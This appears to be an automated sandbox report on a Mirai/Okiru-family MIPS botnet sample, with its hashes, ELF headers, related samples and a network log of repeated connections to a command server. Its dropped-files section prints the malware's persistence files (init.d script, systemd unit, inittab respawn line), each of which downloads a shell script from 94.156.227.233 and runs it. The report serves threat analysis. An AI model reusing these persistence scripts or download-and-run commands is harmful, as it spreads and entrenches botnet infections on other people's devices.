                                                                        sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        nsharm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 91.189.91.42
                                                                        mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        m68k.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        arm6.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        CANONICAL-ASGBarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        hmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        nsharm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 91.189.91.42
                                                                        mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        m68k.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        arm6.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        INIT7CHarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        hmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        nsharm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 109.202.202.202
                                                                        mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        m68k.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        arm6.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        NETIXBGpowerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 94.156.227.234
                                                                        arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        arm5.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        mips.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        /etc/init.d/mipsel.nn.elfmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                          mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                            mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):122
                                                                                        Entropy (8bit):4.669693856826029
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:KPJRXaw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRl/mfoYZX48bbaaeXCO
                                                                                        MD5:6E34D3CD24992F0E2B8E1EDC806358F9
                                                                                        SHA1:2A73EFBE06FF1248F69716044272ACE0C8DECDC6
                                                                                        SHA-256:23A64AD5E742E99A42FFAA0C46B10B247657BC5895DE4A1542F67BB1FE661609
                                                                                        SHA-512:3D559F41A5E8CED20C1038C0B59DCDBC42646D6FB5E262F19F0E4F13EF3FAFAB4A493125F3369227F019C14E34ACB16EEF62C539714DF0EDB8C05C175670A3C6
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:run bootcmd_mmc0; /tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                        Process:/bin/sh
                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                        Category:dropped
                                                                                        Size (bytes):410
                                                                                        Entropy (8bit):4.519449750255623
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:QRkio/MXNxuw/0/ePUJgjvMbw/6FxH/MuKN+dRRucSOyd3:b/2/0/ecIx/ul/3YOM3
                                                                                        MD5:1FE3C77D4BFC384D88694556CA239DFD
                                                                                        SHA1:75C0A180A6E2AA298A4C24866DDC3D6A9F6AF098
                                                                                        SHA-256:9E809BE6063B9C07600212B7E878EA5A7B57E2E9BB0B5514F19BBC8C2F8A2372
                                                                                        SHA-512:3E93C56C0DBE10FF5F7736E57F461C67CB600D6CCABA0AAF6B751C93AEEE00B519F6BA1DE23B881C1535A5E80D6A993BAF195E69923A12AC8DC0354F0B0C9420
                                                                                        Malicious:true
                                                                                        Joe Sandbox View:
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                        Reputation:low
                                                                                        Preview:#!/bin/sh.# /etc/init.d/mipsel.nn.elf..case "" in. start). echo 'Starting mipsel.nn.elf'. /tmp/mipsel.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping mipsel.nn.elf'. killall mipsel.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                        Category:dropped
                                                                                        Size (bytes):109
                                                                                        Entropy (8bit):4.626698510896325
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:TKH4vZKaw/iFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8l/mzSXoZX48bzBeLXE0
                                                                                        MD5:539F8D5E9F9630E7755AFC3255B83847
                                                                                        SHA1:91DE1248768F868C0EB04F195696F677A9CDCD45
                                                                                        SHA-256:68BA58E1ACE339B2C096378C5B6E300939F125E02859BEB4AC94C9A900F3E641
                                                                                        SHA-512:EF7A47FA526F8E284110610389D82529C2D0F635235E69FFEAC28CDAE2A01C346B772A3FFBFA6E1C7097286A190143E2244236CAAB84876502F74B0C5B6B8740
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:#!/bin/sh./tmp/mipsel.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):114
                                                                                        Entropy (8bit):4.594652553807888
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:nAWu5Iw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:AN/mfoYZX48bbaaeXCO
                                                                                        MD5:6519B549572A81833E8C92B99EE17B7F
                                                                                        SHA1:6BBBC13520CDFBF1D7A1B95118124A059116B0ED
                                                                                        SHA-256:33B84F0C2411AA5338C06D292C50BF16A3E7A7E220D49ADEC32E881CD67CF1B3
                                                                                        SHA-512:2634CDAC96A754D2A9EE1C23245A0E67D34ADA15ACC20D9144CEEADB6137CFD9A5CD1A8D3FA53229280B356CECDCA014CFB8B29ECF995112F948C6E763F861DE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:::respawn:/tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):53
                                                                                        Entropy (8bit):3.871459242626451
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                        MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                        SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                        SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                        SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:gorilla botnet is on the device ur not a cat go away.
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):105
                                                                                        Entropy (8bit):4.491314845702613
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Tgaw/iFDvSDRFiLdjX48FIbILbaaFOdFXa50:Tgl/mzSXoZX48bbaaeXC0
                                                                                        MD5:AAF2E90396630CCF6A63DEA3968A287B
                                                                                        SHA1:CF20411B5AE5B40FB111B0DB8B5A22ABFD6A28E7
                                                                                        SHA-256:B7B8AE936784CA3DFFC0D2C5366F02B0A660896520B165744CFE72C0A8151253
                                                                                        SHA-512:FADB72F2A204FA6A2AA5F8DDDD076B10B115A200909AA3390F031E4B91F287B866EAAE32B72EFF521DA7D6F2774C537D585514A8EEED4AB71BFB797061BBD475
                                                                                        Malicious:true
                                                                                        Preview:/tmp/mipsel.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                        Category:dropped
                                                                                        Size (bytes):10
                                                                                        Entropy (8bit):3.121928094887362
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:TKH4vn:hv
                                                                                        MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                                        SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                                        SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                                        SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Preview:#!/bin/sh.
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):303
                                                                                        Entropy (8bit):5.051178844874226
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:z8ifitRZAMzdK+5/M02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+5/Mp+GWRdtd+GWRXY+GWRr
                                                                                        MD5:44EB11E7055C1AD968CFD9407D450693
                                                                                        SHA1:78B694FFAFEFE85FB8436DDDB15F3BCDF1CEA174
                                                                                        SHA-256:AFADB28D87BB66E46AB6CDAF6F20047DCC3DD49DFBD0FDB4FE9DC8F55479ABF7
                                                                                        SHA-512:34C5FEAB113C673CB6A94491571C3C10E554E35F07D53CA1E1F0AD33C4D87BAE52766A29069DA5D206B9DB771BF5F7407E6FD972FDF7C610A35730F883ED5EE9
                                                                                        Malicious:false
                                                                                        Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/mipsel.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):76
                                                                                        Entropy (8bit):3.7627880354948586
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                        Malicious:false
                                                                                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                        Process:/tmp/mipsel.nn.elf
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):19
                                                                                        Entropy (8bit):3.5110854081804286
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Tgaw/iln:Tgl/Gn
                                                                                        MD5:E161F2EC9C1A693BE77DD848C5A17087
                                                                                        SHA1:C6DC3683D6AF6B3AD69F1E155638994278FD3DC9
                                                                                        SHA-256:6EC0A33B73DE74EBEB61B23D54BFF44B920A3F994E0781781253974DB671921F
                                                                                        SHA-512:79FEC2E25B4E40804C09089CDAC6D8A9C2FE0F90D096D6DEF3DE458D572EBE6D18740670BA9F33B45DAA80D4104252ECAAB075B44D5ED9BEDF8C5644DB302145
                                                                                        Malicious:false
                                                                                        Preview:/tmp/mipsel.nn.elf.
                                                                                        File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                                        Entropy (8bit):5.556539520812631
                                                                                        TrID:
                                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                        File name:mipsel.nn.elf
                                                                                        File size:118'656 bytes
                                                                                        MD5:c07c769680b684bce01e72800bd11635
                                                                                        SHA1:ba5700e7489f5ae48ce165b58a43a68148978060
                                                                                        SHA256:799df6ce4695925d10cb52f413cceda3b9045d9dfa3039f8c7fed403f423d2ea
                                                                                        SHA512:83bc3670bbf8748fbe643a0c6f2371088ecd890c023edb0f00c8af7457ed1d55060a6ac2a8ac35ff34d9374dd9f2c5c16e3222e2d2306e29f85a7da801eb51c1
                                                                                        SSDEEP:1536:X0MFEziYKeexkyxhY7SKRV8n2rMk0RpI4VcmO3ZZVemyGDP/PrGsi2v:bFEWYKdkuI4VXEp/rGsi2
                                                                                        TLSH:31C3E706BB641FF7ECABCD3746BD170124CC585B12A92B353934E918F60E25B1AE3DA4
                                                                                        File Content Preview:.ELF....................`.@.4...P.......4. ...(...............@...@.p...p.....................E...E.....\/..........Q.td...............................<.D.'!......'.......................<.D.'!... .........9'.. ........................<xD.'!.............9

                                                                                        ELF header

                                                                                        Class:ELF32
                                                                                        Data:2's complement, little endian
                                                                                        Version:1 (current)
                                                                                        Machine:MIPS R3000
                                                                                        Version Number:0x1
                                                                                        Type:EXEC (Executable file)
                                                                                        OS/ABI:UNIX - System V
                                                                                        ABI Version:0
                                                                                        Entry Point Address:0x400260
                                                                                        Flags:0x1007
                                                                                        ELF Header Size:52
                                                                                        Program Header Offset:52
                                                                                        Program Header Size:32
                                                                                        Number of Program Headers:3
                                                                                        Section Header Offset:118096
                                                                                        Section Header Size:40
                                                                                        Number of Section Headers:14
                                                                                        Header String Table Index:13
                                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                        NULL0x00x00x00x00x0000
                                                                                        .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                                        .textPROGBITS0x4001200x1200x18d600x00x6AX0016
                                                                                        .finiPROGBITS0x418e800x18e800x5c0x00x6AX004
                                                                                        .rodataPROGBITS0x418ee00x18ee00x26900x00x2A0016
                                                                                        .ctorsPROGBITS0x45c0000x1c0000x80x00x3WA004
                                                                                        .dtorsPROGBITS0x45c0080x1c0080x80x00x3WA004
                                                                                        .data.rel.roPROGBITS0x45c0140x1c0140x540x00x3WA004
                                                                                        .dataPROGBITS0x45c0700x1c0700x5000x00x3WA0016
                                                                                        .gotPROGBITS0x45c5700x1c5700x77c0x40x10000003WAp0016
                                                                                        .sbssNOBITS0x45ccec0x1ccec0x200x00x10000003WAp004
                                                                                        .bssNOBITS0x45cd100x1ccec0x224c0x00x3WA0016
                                                                                        .mdebug.abi32PROGBITS0xe100x1ccec0x00x00x0001
                                                                                        .shstrtabSTRTAB0x00x1ccec0x640x00x0001
                                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                        LOAD0x00x4000000x4000000x1b5700x1b5705.66400x5R E0x10000.init .text .fini .rodata
                                                                                        LOAD0x1c0000x45c0000x45c0000xcec0x2f5c4.17200x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 09:42:52.173113108 CET43928443192.168.2.2391.189.91.42
                                                                                        Dec 24, 2024 09:42:54.201349020 CET6001038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:54.320844889 CET382426001094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:54.320904970 CET6001038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:54.321218014 CET6001038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:54.440650940 CET382426001094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:54.842262983 CET6001038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:55.004607916 CET382426001094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:55.445696115 CET382426001094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:55.445792913 CET6001038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:55.845719099 CET6001238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:55.965451956 CET382426001294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:55.965528011 CET6001238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:55.965595007 CET6001238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:56.087599993 CET382426001294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:56.478904009 CET6001238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:56.644594908 CET382426001294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:57.097086906 CET382426001294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:57.097145081 CET6001238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:57.481262922 CET6001438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:57.600783110 CET382426001494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:57.600912094 CET6001438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:57.600960016 CET6001438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:57.720515013 CET382426001494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:57.804208040 CET42836443192.168.2.2391.189.91.43
                                                                                        Dec 24, 2024 09:42:58.160176039 CET6001438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:58.320625067 CET382426001494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:58.723761082 CET382426001494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:58.723834991 CET6001438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:58.828047991 CET4251680192.168.2.23109.202.202.202
                                                                                        Dec 24, 2024 09:42:59.161128998 CET6001638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:59.280680895 CET382426001694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:59.280894995 CET6001638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:59.280894995 CET6001638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:59.400485039 CET382426001694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:42:59.785582066 CET6001638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:42:59.948542118 CET382426001694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:00.406517982 CET382426001694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:00.406594992 CET6001638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:00.786314964 CET6001838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:00.905878067 CET382426001894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:00.905966043 CET6001838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:00.905993938 CET6001838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:01.025500059 CET382426001894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:01.409292936 CET6001838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:01.576715946 CET382426001894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:02.023225069 CET382426001894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:02.023351908 CET6001838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:02.410238981 CET6002038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:02.529912949 CET382426002094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:02.529983997 CET6002038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:02.530025005 CET6002038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:02.649636030 CET382426002094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:03.033227921 CET6002038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:03.202449083 CET382426002094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:03.662164927 CET382426002094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:03.662251949 CET6002038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:04.034332037 CET6002238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:04.154048920 CET382426002294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:04.154153109 CET6002238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:04.154185057 CET6002238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:04.274053097 CET382426002294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:04.658158064 CET6002238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:04.820599079 CET382426002294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:05.556353092 CET382426002294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:05.556443930 CET6002238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:05.648617983 CET382426002294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:05.648691893 CET6002238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:05.659033060 CET6002438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:05.768311977 CET382426002294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:05.778593063 CET382426002494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:05.778677940 CET6002438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:05.778717041 CET6002438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:05.898302078 CET382426002494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:06.281737089 CET6002438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:06.444489956 CET382426002494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:06.910752058 CET382426002494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:06.910830021 CET6002438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:07.282532930 CET6002638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:07.402136087 CET382426002694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:07.402252913 CET6002638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:07.402621031 CET6002638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:07.522037983 CET382426002694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:07.906368971 CET6002638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:08.072560072 CET382426002694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:08.531511068 CET382426002694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:08.531622887 CET6002638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:08.907496929 CET6002838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:09.027050018 CET382426002894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:09.027143002 CET6002838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:09.027164936 CET6002838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:09.146625042 CET382426002894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:09.532154083 CET6002838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:09.692558050 CET382426002894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:10.155500889 CET382426002894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:10.155580997 CET6002838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:10.533509016 CET6003038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:10.653091908 CET382426003094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:10.653203011 CET6003038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:10.653243065 CET6003038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:10.773000002 CET382426003094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:11.158826113 CET6003038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:11.324574947 CET382426003094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:11.779529095 CET382426003094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:11.779622078 CET6003038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:12.159986973 CET6003238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:12.279464960 CET382426003294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:12.279536963 CET6003238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:12.279637098 CET6003238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:12.399023056 CET382426003294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:12.650221109 CET43928443192.168.2.2391.189.91.42
                                                                                        Dec 24, 2024 09:43:12.784609079 CET6003238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:12.944469929 CET382426003294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:13.403917074 CET382426003294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:13.403985023 CET6003238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:13.785852909 CET6003438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:43:13.905500889 CET382426003494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:43:13.905581951 CET6003438242192.168.2.2394.156.227.234
